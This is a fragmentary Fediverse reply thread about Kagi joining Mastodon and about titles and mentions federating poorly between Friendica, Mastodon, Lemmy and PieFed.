Cybersecurity & cyberwarfare
in reply to rglullis • •rglullis
in reply to Cybersecurity & cyberwarfare • • •Cybersecurity & cyberwarfare likes this.
Cybersecurity & cyberwarfare
Unknown parent • •cabbage
Unknown parent • • •Mastodon posts tend to get funky when they federate, because Mastodon has this (annoying) norm of starting posts with mentions. So OP mentioned the community on the first line, which became the first part of the title - @fediverse. Second, it mentions Kagi as a tag instead of name, which gives the @kagihq. And then comes the first sentence as the rest of the title.
It's a great example of Lemmy/Mastodon interoperability working, but not being quite there yet.
Cybersecurity & cyberwarfare
in reply to cabbage • •@cabbage
I'm not writing from Mastodon, but from Friendica
The mentions problem seems to be only for PieFed, but it doesn't happen with Lemmy
I think it should be reported as an issue to PieFed developers
willya
in reply to Cybersecurity & cyberwarfare • • •Cybersecurity & cyberwarfare likes this.
Cybersecurity & cyberwarfare
in reply to willya • •cabbage
in reply to willya • • •I can only speak for myself, but I like to keep posted when important people and organizations are opening accounts on the Fediverse. 😀
It's funny that Kagi included "fediverse forums" functionality in their search before they decided to join Mastodon - one would think the search functionality required a bit more.
Cybersecurity & cyberwarfare likes this.
Cybersecurity & cyberwarfare reshared this.
asudox
in reply to Cybersecurity & cyberwarfare • • •Unlike Kagi, I can search without limits and without the AI stuff that even Kagi has started getting into.
Cybersecurity & cyberwarfare likes this.
Cybersecurity & cyberwarfare reshared this.
cabbage
in reply to Cybersecurity & cyberwarfare • • •It seems you're right - the title field from Friendica doesn't federate well to PieFed. So I probably misinterpreted the confusion about the title. 😀
@rimu@piefed.social
Cybersecurity & cyberwarfare likes this.
ericjmorey
in reply to Cybersecurity & cyberwarfare • • •Cybersecurity & cyberwarfare likes this.
aldalire
in reply to Cybersecurity & cyberwarfare • • •XNX
in reply to Cybersecurity & cyberwarfare • • •Cybersecurity & cyberwarfare likes this.